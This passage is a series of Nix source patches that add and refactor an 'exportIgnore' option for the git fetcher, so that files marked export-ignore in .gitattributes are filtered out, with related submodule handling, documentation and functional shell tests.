diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 65f7b45ef..4dc749504 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -7,6 +7,7 @@ #include +#include #include #include #include @@ -21,6 +22,7 @@ #include #include +#include #include #include #include @@ -307,7 +309,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return std::nullopt; } - std::vector> getSubmodules(const Hash & rev) override; + std::vector> getSubmodules(const Hash & rev, bool exportIgnore) override; std::string resolveSubmoduleUrl( const std::string & url, @@ -340,7 +342,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return true; } - ref getAccessor(const Hash & rev) override; + ref getAccessor(const Hash & rev, bool exportIgnore) override; static int sidebandProgressCallback(const char * str, int len, void * payload) { @@ -460,10 +462,12 @@ struct GitInputAccessor : InputAccessor { ref repo; Tree root; + bool exportIgnore; - GitInputAccessor(ref repo_, const Hash & rev) + GitInputAccessor(ref repo_, const Hash & rev, bool exportIgnore) : repo(repo_) , root(peelObject(*repo, lookupObject(*repo, hashToOID(rev)).get(), GIT_OBJECT_TREE)) + , exportIgnore(exportIgnore) { } @@ -492,7 +496,7 @@ struct GitInputAccessor : InputAccessor return Stat { .type = tDirectory }; auto entry = lookup(path); - if (!entry) + if (!entry || isExportIgnored(path)) return std::nullopt; auto mode = git_tree_entry_filemode(entry); @@ -527,6 +531,12 @@ struct GitInputAccessor : InputAccessor for (size_t n = 0; n < count; ++n) { auto entry = git_tree_entry_byindex(tree.get(), n); + if (exportIgnore) { + if (isExportIgnored(path + git_tree_entry_name(entry))) { + continue; + } + } + // FIXME: add to cache res.emplace(std::string(git_tree_entry_name(entry)), DirEntry{}); } @@ -556,6 +566,33 @@ struct GitInputAccessor : InputAccessor std::unordered_map lookupCache; + bool isExportIgnored(const CanonPath & path) { + if (!exportIgnore) + 
return false; + + const char *exportIgnoreEntry = nullptr; + + // GIT_ATTR_CHECK_INDEX_ONLY: + // > It will use index only for creating archives or for a bare repo + // > (if an index has been specified for the bare repo). + // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 + if (git_attr_get(&exportIgnoreEntry, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY, + std::string(path.rel()).c_str(), + "export-ignore")) { + if (git_error_last()->klass == GIT_ENOTFOUND) + return false; + else + throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); + } + else { + // Official git will silently reject export-ignore lines that have + // values. We do the same. + return GIT_ATTR_IS_TRUE(exportIgnoreEntry); + } + } + /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) { @@ -569,6 +606,10 @@ struct GitInputAccessor : InputAccessor throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); } + if (entry && isExportIgnored(path)) { + entry.reset(); + } + i = lookupCache.emplace(path, std::move(entry)).first; } @@ -644,17 +685,17 @@ struct GitInputAccessor : InputAccessor } }; -ref GitRepoImpl::getAccessor(const Hash & rev) +ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { - return make_ref(ref(shared_from_this()), rev); + return make_ref(ref(shared_from_this()), rev, exportIgnore); } -std::vector> GitRepoImpl::getSubmodules(const Hash & rev) +std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) { /* Read the .gitmodules files from this revision. */ CanonPath modulesFile(".gitmodules"); - auto accessor = getAccessor(rev); + auto accessor = getAccessor(rev, exportIgnore); if (!accessor->pathExists(modulesFile)) return {}; /* Parse it and get the revision of each submodule. 
*/ diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 1def82071..f1cb48065 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -57,7 +57,7 @@ struct GitRepo * Return the submodules of this repo at the indicated revision, * along with the revision of each submodule. */ - virtual std::vector> getSubmodules(const Hash & rev) = 0; + virtual std::vector> getSubmodules(const Hash & rev, bool exportIgnore) = 0; virtual std::string resolveSubmoduleUrl( const std::string & url, @@ -71,7 +71,7 @@ struct GitRepo virtual bool hasObject(const Hash & oid) = 0; - virtual ref getAccessor(const Hash & rev) = 0; + virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0; virtual void fetch( const std::string & url, diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 79270c317..fb8bf5bf4 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -174,7 +174,7 @@ struct GitInputScheme : InputScheme for (auto & [name, value] : url.query) { if (name == "rev" || name == "ref" || name == "keytype" || name == "publicKey" || name == "publicKeys") attrs.emplace(name, value); - else if (name == "shallow" || name == "submodules" || name == "allRefs" || name == "verifyCommit") + else if (name == "shallow" || name == "submodules" || name == "exportIgnore" || name == "allRefs" || name == "verifyCommit") attrs.emplace(name, Explicit { value == "1" }); else url2.query.emplace(name, value); @@ -199,6 +199,7 @@ struct GitInputScheme : InputScheme "rev", "shallow", "submodules", + "exportIgnore", "lastModified", "revCount", "narHash", @@ -250,6 +251,8 @@ struct GitInputScheme : InputScheme url.query.insert_or_assign("shallow", "1"); if (getSubmodulesAttr(input)) url.query.insert_or_assign("submodules", "1"); + if (maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)) + url.query.insert_or_assign("exportIgnore", "1"); if (maybeGetBoolAttr(input.attrs, "verifyCommit").value_or(false)) 
url.query.insert_or_assign("verifyCommit", "1"); auto publicKeys = getPublicKeys(input.attrs); @@ -372,6 +375,11 @@ struct GitInputScheme : InputScheme return maybeGetBoolAttr(input.attrs, "submodules").value_or(false); } + bool getExportIgnoreAttr(const Input & input) const + { + return maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false); + } + bool getAllRefsAttr(const Input & input) const { return maybeGetBoolAttr(input.attrs, "allRefs").value_or(false); @@ -600,7 +608,8 @@ struct GitInputScheme : InputScheme verifyCommit(input, repo); - auto accessor = repo->getAccessor(rev); + bool exportIgnore = getExportIgnoreAttr(input); + auto accessor = repo->getAccessor(rev, exportIgnore); accessor->setPathDisplay("«" + input.to_string() + "»"); @@ -610,7 +619,7 @@ struct GitInputScheme : InputScheme if (getSubmodulesAttr(input)) { std::map> mounts; - for (auto & [submodule, submoduleRev] : repo->getSubmodules(rev)) { + for (auto & [submodule, submoduleRev] : repo->getSubmodules(rev, exportIgnore)) { auto resolved = repo->resolveSubmoduleUrl(submodule.url, repoInfo.url); debug("Git submodule %s: %s %s %s -> %s", submodule.path, submodule.url, submodule.branch, submoduleRev.gitRev(), resolved); diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index f0438f548..46532c025 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -231,12 +231,15 @@ unset _NIX_FORCE_HTTP # Ensure .gitattributes is respected touch $repo/not-exported-file +touch $repo/exported-wonky echo "/not-exported-file export-ignore" >> $repo/.gitattributes -git -C $repo add not-exported-file .gitattributes +echo "/exported-wonky export-ignore=wonk" >> $repo/.gitattributes +git -C $repo add not-exported-file exported-wonky .gitattributes git -C $repo commit -m 'Bla6' rev5=$(git -C $repo rev-parse HEAD) path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"$rev5\"; }).outPath") [[ ! 
-e $path12/not-exported-file ]] +[[ -e $path12/exported-wonky ]] # should fail if there is no repo rm -rf $repo/.git From 1c6bb609af3277ff3f747f49d04be80463d1f153 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 28 Nov 2023 00:41:01 +0100 Subject: [PATCH 228/654] fetchTree: allow larger output attrsets Intentionally dumb change ahead of architectural improvements. --- src/libexpr/primops/fetchTree.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index e00c4f190..d04908b77 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -25,7 +25,7 @@ void emitTreeAttrs( { assert(input.isLocked()); - auto attrs = state.buildBindings(10); + auto attrs = state.buildBindings(100); state.mkStorePathString(storePath, attrs.alloc(state.sOutPath)); From f6b1d155804a946ff2965b5fd1a57159770e8b58 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:27:13 +0100 Subject: [PATCH 229/654] MakeNotAllowedError: Touch up doc --- src/libfetchers/filtering-input-accessor.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index a352a33a6..2e2495c78 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -6,7 +6,7 @@ namespace nix { /** - * A function that should throw an exception of type + * A function that returns an exception of type * `RestrictedPathError` explaining that access to `path` is * forbidden. */ From cd5e752fa72bf15ba8fe6fcdae92c77ac6dc2375 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:30:10 +0100 Subject: [PATCH 230/654] GitRepoImpl::getSubmodules: Access getSubmoduleRev without cast This will be needed because the accessor will be wrapped, and therefore not be an instance of GitInputAccessor anymore. 
--- src/libfetchers/git-utils.cc | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 4dc749504..d8a4f1778 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -52,6 +52,8 @@ bool operator == (const git_oid & oid1, const git_oid & oid2) namespace nix { +struct GitInputAccessor; + // Some wrapper types that ensure that the git_*_free functions get called. template struct Deleter @@ -342,6 +344,11 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return true; } + /** + * A 'GitInputAccessor' with no regard for export-ignore or any other transformations. + */ + ref getRawAccessor(const Hash & rev); + ref getAccessor(const Hash & rev, bool exportIgnore) override; static int sidebandProgressCallback(const char * str, int len, void * payload) @@ -685,6 +692,12 @@ struct GitInputAccessor : InputAccessor } }; +ref GitRepoImpl::getRawAccessor(const Hash & rev) +{ + auto self = ref(shared_from_this()); + return make_ref(self, rev); +} + ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { return make_ref(ref(shared_from_this()), rev, exportIgnore); @@ -706,8 +719,10 @@ std::vector> GitRepoImpl::getSubmodules std::vector> result; + auto rawAccessor = getRawAccessor(rev); + for (auto & submodule : parseSubmodules(CanonPath(pathTemp))) { - auto rev = accessor.dynamic_pointer_cast()->getSubmoduleRev(submodule.path); + auto rev = rawAccessor->getSubmoduleRev(submodule.path); result.push_back({std::move(submodule), rev}); } From 467c62a96eaabe2f71939a07d923a759f82a466f Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:32:18 +0100 Subject: [PATCH 231/654] GitRepoImpl: Move exportIgnore into a filtering accessor --- src/libfetchers/git-utils.cc | 96 ++++++++++++++++++++---------------- 1 file changed, 54 insertions(+), 42 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 
d8a4f1778..f8b2afeef 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -1,5 +1,6 @@ #include "git-utils.hh" #include "input-accessor.hh" +#include "filtering-input-accessor.hh" #include "cache.hh" #include "finally.hh" #include "processes.hh" @@ -465,16 +466,17 @@ ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) return make_ref(path, create, bare); } +/** + * Raw git tree input accessor. + */ struct GitInputAccessor : InputAccessor { ref repo; Tree root; - bool exportIgnore; - GitInputAccessor(ref repo_, const Hash & rev, bool exportIgnore) + GitInputAccessor(ref repo_, const Hash & rev) : repo(repo_) , root(peelObject(*repo, lookupObject(*repo, hashToOID(rev)).get(), GIT_OBJECT_TREE)) - , exportIgnore(exportIgnore) { } @@ -503,7 +505,7 @@ struct GitInputAccessor : InputAccessor return Stat { .type = tDirectory }; auto entry = lookup(path); - if (!entry || isExportIgnored(path)) + if (!entry) return std::nullopt; auto mode = git_tree_entry_filemode(entry); @@ -538,12 +540,6 @@ struct GitInputAccessor : InputAccessor for (size_t n = 0; n < count; ++n) { auto entry = git_tree_entry_byindex(tree.get(), n); - if (exportIgnore) { - if (isExportIgnored(path + git_tree_entry_name(entry))) { - continue; - } - } - // FIXME: add to cache res.emplace(std::string(git_tree_entry_name(entry)), DirEntry{}); } @@ -573,33 +569,6 @@ struct GitInputAccessor : InputAccessor std::unordered_map lookupCache; - bool isExportIgnored(const CanonPath & path) { - if (!exportIgnore) - return false; - - const char *exportIgnoreEntry = nullptr; - - // GIT_ATTR_CHECK_INDEX_ONLY: - // > It will use index only for creating archives or for a bare repo - // > (if an index has been specified for the bare repo). 
- // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 - if (git_attr_get(&exportIgnoreEntry, - *repo, - GIT_ATTR_CHECK_INDEX_ONLY, - std::string(path.rel()).c_str(), - "export-ignore")) { - if (git_error_last()->klass == GIT_ENOTFOUND) - return false; - else - throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); - } - else { - // Official git will silently reject export-ignore lines that have - // values. We do the same. - return GIT_ATTR_IS_TRUE(exportIgnoreEntry); - } - } - /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) { @@ -613,10 +582,6 @@ struct GitInputAccessor : InputAccessor throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); } - if (entry && isExportIgnored(path)) { - entry.reset(); - } - i = lookupCache.emplace(path, std::move(entry)).first; } @@ -692,6 +657,46 @@ struct GitInputAccessor : InputAccessor } }; +struct GitExportIgnoreInputAccessor : FilteringInputAccessor { + ref repo; + + GitExportIgnoreInputAccessor(ref repo, ref next) + : FilteringInputAccessor(next, [&](const CanonPath & path) { + return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); + }) + , repo(repo) + { } + + bool isExportIgnored(const CanonPath & path) { + const char *exportIgnoreEntry = nullptr; + + // GIT_ATTR_CHECK_INDEX_ONLY: + // > It will use index only for creating archives or for a bare repo + // > (if an index has been specified for the bare repo). 
+ // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 + if (git_attr_get(&exportIgnoreEntry, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY, + std::string(path.rel()).c_str(), + "export-ignore")) { + if (git_error_last()->klass == GIT_ENOTFOUND) + return false; + else + throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); + } + else { + // Official git will silently reject export-ignore lines that have + // values. We do the same. + return GIT_ATTR_IS_TRUE(exportIgnoreEntry); + } + } + + bool isAllowed(const CanonPath & path) override { + return !isExportIgnored(path); + } + +}; + ref GitRepoImpl::getRawAccessor(const Hash & rev) { auto self = ref(shared_from_this()); @@ -700,7 +705,14 @@ ref GitRepoImpl::getRawAccessor(const Hash & rev) ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { - return make_ref(ref(shared_from_this()), rev, exportIgnore); + auto self = ref(shared_from_this()); + ref rawGitAccessor = getRawAccessor(rev); + if (exportIgnore) { + return make_ref(self, rawGitAccessor); + } + else { + return rawGitAccessor; + } } std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) From 8024b954d702e0693b532650230037e398453693 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 19:42:46 +0100 Subject: [PATCH 232/654] fetchTree: Recommend against exportIgnore --- src/libexpr/primops/fetchTree.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index d04908b77..2e4b72c9f 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -607,6 +607,8 @@ static RegisterPrimOp primop_fetchGit({ A Boolean parameter that specifies whether `export-ignore` from `.gitattributes` should be applied. This approximates part of the `git archive` behavior. 
+ Enabling this option is not recommended because it is unknown whether the Git developers commit to the reproducibility of `export-ignore` in newer Git versions. + - `shallow` (default: `false`) A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. From 7774eff10e0ec1f540a6dc22d8fd78de40714bdf Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:28:53 +0100 Subject: [PATCH 233/654] libfetchers/git: Move workdir accessor into GitRepo::getAccessor --- src/libfetchers/git-utils.cc | 19 +++++++++++++++++++ src/libfetchers/git-utils.hh | 3 +++ src/libfetchers/git.cc | 8 ++++---- 3 files changed, 26 insertions(+), 4 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index f8b2afeef..d218276b4 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -1,4 +1,5 @@ #include "git-utils.hh" +#include "fs-input-accessor.hh" #include "input-accessor.hh" #include "filtering-input-accessor.hh" #include "cache.hh" @@ -352,6 +353,8 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this ref getAccessor(const Hash & rev, bool exportIgnore) override; + ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError e) override; + static int sidebandProgressCallback(const char * str, int len, void * payload) { auto act = (Activity *) payload; @@ -715,6 +718,22 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) } } +ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) +{ + auto self = ref(shared_from_this()); + ref fileAccessor = + AllowListInputAccessor::create( + makeFSInputAccessor(path), + std::set { wd.files }, + std::move(makeNotAllowedError)); + if (exportIgnore) { + return make_ref(self, fileAccessor); + } + else { + return fileAccessor; + } +} + std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) { /* Read the .gitmodules files from this 
revision. */ diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index f1cb48065..768554780 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -1,5 +1,6 @@ #pragma once +#include "filtering-input-accessor.hh" #include "input-accessor.hh" namespace nix { @@ -73,6 +74,8 @@ struct GitRepo virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0; + virtual ref getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) = 0; + virtual void fetch( const std::string & url, const std::string & refspec, diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index fb8bf5bf4..d7818988f 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -9,7 +9,6 @@ #include "processes.hh" #include "git.hh" #include "fs-input-accessor.hh" -#include "filtering-input-accessor.hh" #include "mounted-input-accessor.hh" #include "git-utils.hh" #include "logging.hh" @@ -659,10 +658,11 @@ struct GitInputScheme : InputScheme for (auto & submodule : repoInfo.workdirInfo.submodules) repoInfo.workdirInfo.files.insert(submodule.path); + auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + ref accessor = - AllowListInputAccessor::create( - makeFSInputAccessor(CanonPath(repoInfo.url)), - std::move(repoInfo.workdirInfo.files), + repo->getAccessor(repoInfo.workdirInfo, + getExportIgnoreAttr(input), makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor From 1bbe8371849f33da4edba23289de7b7e3c5d6c83 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:35:11 +0100 Subject: [PATCH 234/654] fetchTree: Add isFetchGit exportIgnore --- src/libexpr/primops/fetchTree.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 2e4b72c9f..c167444b0 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -161,6 +161,7 @@ static 
void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); + attrs.emplace("exportIgnore", Explicit{true}); input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) From 99bd12f0b18b1a2a94639134c49c478c9ab56b3b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 11 Dec 2023 22:36:08 +0100 Subject: [PATCH 235/654] fetchGit/fetchTree: Improve exportIgnore, submodule interaction Also fingerprint and some preparatory improvements. Testing is still not up to scratch because lots of logic is duplicated between the workdir and commit cases. --- src/libexpr/primops/fetchTree.cc | 16 ++++++---- src/libfetchers/fetchers.hh | 7 +++++ src/libfetchers/git-utils.cc | 43 +++++++++++++++++++++----- src/libfetchers/git.cc | 9 ++++-- tests/functional/fetchGitSubmodules.sh | 42 +++++++++++++++++++++++++ 5 files changed, 101 insertions(+), 16 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index c167444b0..7a4725334 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -116,11 +116,6 @@ static void fetchTree( attrs.emplace("type", type.value()); - if (params.isFetchGit) { - // Default value; user attrs are assigned later. - attrs.emplace("exportIgnore", Explicit{true}); - } - for (auto & attr : *args[0]->attrs) { if (attr.name == state.sType) continue; state.forceValue(*attr.value, attr.pos); @@ -144,6 +139,12 @@ static void fetchTree( state.symbols[attr.name], showType(*attr.value))); } + if (params.isFetchGit && !attrs.contains("exportIgnore")) { + // Default value; user attrs are assigned later. 
+ // FIXME: exportIgnore := !submodules + attrs.emplace("exportIgnore", Explicit{true}); + } + if (!params.allowNameArgument) if (auto nameIter = attrs.find("name"); nameIter != attrs.end()) state.debugThrowLastTrace(EvalError({ @@ -161,7 +162,10 @@ static void fetchTree( fetchers::Attrs attrs; attrs.emplace("type", "git"); attrs.emplace("url", fixGitURL(url)); - attrs.emplace("exportIgnore", Explicit{true}); + if (!attrs.contains("exportIgnore")) { + // FIXME: exportIgnore := !submodules + attrs.emplace("exportIgnore", Explicit{true}); + } input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh index 5f3254b6d..036647830 100644 --- a/src/libfetchers/fetchers.hh +++ b/src/libfetchers/fetchers.hh @@ -187,6 +187,13 @@ struct InputScheme virtual bool isDirect(const Input & input) const { return true; } + /** + * A sufficiently unique string that can be used as a cache key to identify the `input`. + * + * Only known-equivalent inputs should return the same fingerprint. + * + * This is not a stable identifier between Nix versions, but not guaranteed to change either. 
+ */ virtual std::optional getFingerprint(ref store, const Input & input) const { return std::nullopt; } }; diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index d218276b4..cd65e0fda 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -662,14 +662,45 @@ struct GitInputAccessor : InputAccessor struct GitExportIgnoreInputAccessor : FilteringInputAccessor { ref repo; + std::optional rev; - GitExportIgnoreInputAccessor(ref repo, ref next) + GitExportIgnoreInputAccessor(ref repo, ref next, std::optional rev) : FilteringInputAccessor(next, [&](const CanonPath & path) { return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); }) , repo(repo) + , rev(rev) { } + bool gitAttrGet(const CanonPath & path, const char * attrName, const char * & valueOut) + { + std::string pathStr {path.rel()}; + const char * pathCStr = pathStr.c_str(); + + if (rev) { + git_attr_options opts = GIT_ATTR_OPTIONS_INIT; + opts.attr_commit_id = hashToOID(*rev); + // TODO: test that gitattributes from global and system are not used + // (ie more or less: home and etc - both of them!) + opts.flags = GIT_ATTR_CHECK_INCLUDE_COMMIT | GIT_ATTR_CHECK_NO_SYSTEM; + return git_attr_get_ext( + &valueOut, + *repo, + &opts, + pathCStr, + attrName + ); + } + else { + return git_attr_get( + &valueOut, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY | GIT_ATTR_CHECK_NO_SYSTEM, + pathCStr, + attrName); + } + } + bool isExportIgnored(const CanonPath & path) { const char *exportIgnoreEntry = nullptr; @@ -677,11 +708,7 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { // > It will use index only for creating archives or for a bare repo // > (if an index has been specified for the bare repo). 
// -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 - if (git_attr_get(&exportIgnoreEntry, - *repo, - GIT_ATTR_CHECK_INDEX_ONLY, - std::string(path.rel()).c_str(), - "export-ignore")) { + if (gitAttrGet(path, "export-ignore", exportIgnoreEntry)) { if (git_error_last()->klass == GIT_ENOTFOUND) return false; else @@ -711,7 +738,7 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) auto self = ref(shared_from_this()); ref rawGitAccessor = getRawAccessor(rev); if (exportIgnore) { - return make_ref(self, rawGitAccessor); + return make_ref(self, rawGitAccessor, rev); } else { return rawGitAccessor; @@ -727,7 +754,7 @@ ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportI std::set { wd.files }, std::move(makeNotAllowedError)); if (exportIgnore) { - return make_ref(self, fileAccessor); + return make_ref(self, fileAccessor, std::nullopt); } else { return fileAccessor; diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index d7818988f..10c0aef97 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -628,6 +628,7 @@ struct GitInputScheme : InputScheme if (submodule.branch != "") attrs.insert_or_assign("ref", submodule.branch); attrs.insert_or_assign("rev", submoduleRev.gitRev()); + attrs.insert_or_assign("exportIgnore", Explicit{ exportIgnore }); auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs)); auto [submoduleAccessor, submoduleInput2] = submoduleInput.getAccessor(store); @@ -660,9 +661,11 @@ struct GitInputScheme : InputScheme auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + auto exportIgnore = getExportIgnoreAttr(input); + ref accessor = repo->getAccessor(repoInfo.workdirInfo, - getExportIgnoreAttr(input), + exportIgnore, makeNotAllowedError(repoInfo.url)); /* If the repo has submodules, return a mounted input accessor @@ -676,6 +679,8 @@ struct GitInputScheme : InputScheme fetchers::Attrs attrs; attrs.insert_or_assign("type", "git"); 
attrs.insert_or_assign("url", submodulePath.abs()); + attrs.insert_or_assign("exportIgnore", Explicit{ exportIgnore }); + auto submoduleInput = fetchers::Input::fromAttrs(std::move(attrs)); auto [submoduleAccessor, submoduleInput2] = submoduleInput.getAccessor(store); @@ -747,7 +752,7 @@ struct GitInputScheme : InputScheme std::optional getFingerprint(ref store, const Input & input) const override { if (auto rev = input.getRev()) - return rev->gitRev() + (getSubmodulesAttr(input) ? ";s" : ""); + return rev->gitRev() + (getSubmodulesAttr(input) ? ";s" : "") + (getExportIgnoreAttr(input) ? ";e" : ""); else return std::nullopt; } diff --git a/tests/functional/fetchGitSubmodules.sh b/tests/functional/fetchGitSubmodules.sh index 369cdc5db..1b425820e 100644 --- a/tests/functional/fetchGitSubmodules.sh +++ b/tests/functional/fetchGitSubmodules.sh @@ -118,3 +118,45 @@ cloneRepo=$TEST_ROOT/a/b/gitSubmodulesClone # NB /a/b to make the relative path git clone $rootRepo $cloneRepo pathIndirect=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$cloneRepo; rev = \"$rev2\"; submodules = true; }).outPath") [[ $pathIndirect = $pathWithRelative ]] + +# Test submodule export-ignore interaction +git -C $rootRepo/sub config user.email "foobar@example.com" +git -C $rootRepo/sub config user.name "Foobar" + +echo "/exclude-from-root export-ignore" >> $rootRepo/.gitattributes +echo nope > $rootRepo/exclude-from-root +git -C $rootRepo add .gitattributes exclude-from-root +git -C $rootRepo commit -m "Add export-ignore" + +echo "/exclude-from-sub export-ignore" >> $rootRepo/sub/.gitattributes +echo nope > $rootRepo/sub/exclude-from-sub +git -C $rootRepo/sub add .gitattributes exclude-from-sub +git -C $rootRepo/sub commit -m "Add export-ignore (sub)" + +git -C $rootRepo add sub +git -C $rootRepo commit -m "Update submodule" + +git -C $rootRepo status + +# exportIgnore can be used with submodules +pathWithExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = 
file://$rootRepo; submodules = true; exportIgnore = true; }).outPath") +# find $pathWithExportIgnore +# git -C $rootRepo archive --format=tar HEAD | tar -t +# cp -a $rootRepo /tmp/rootRepo + +[[ -e $pathWithExportIgnore/sub/content ]] +[[ ! -e $pathWithExportIgnore/exclude-from-root ]] +[[ ! -e $pathWithExportIgnore/sub/exclude-from-sub ]] + +# exportIgnore can be explicitly disabled with submodules +pathWithoutExportIgnore=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; exportIgnore = false; }).outPath") +# find $pathWithoutExportIgnore + +[[ -e $pathWithoutExportIgnore/exclude-from-root ]] +[[ -e $pathWithoutExportIgnore/sub/exclude-from-sub ]] + +# exportIgnore defaults to false when submodules = true +pathWithSubmodules=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$rootRepo; submodules = true; }).outPath") + +[[ -e $pathWithoutExportIgnore/exclude-from-root ]] +[[ -e $pathWithoutExportIgnore/sub/exclude-from-sub ]] From 71d08af15bb2973dc2a1cb7fee18f94d779dfed7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 5 Jan 2024 19:01:12 +0100 Subject: [PATCH 236/654] rl-next: Add *general* note about git fetcher reimpl --- doc/manual/rl-next/git-fetcher.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 doc/manual/rl-next/git-fetcher.md diff --git a/doc/manual/rl-next/git-fetcher.md 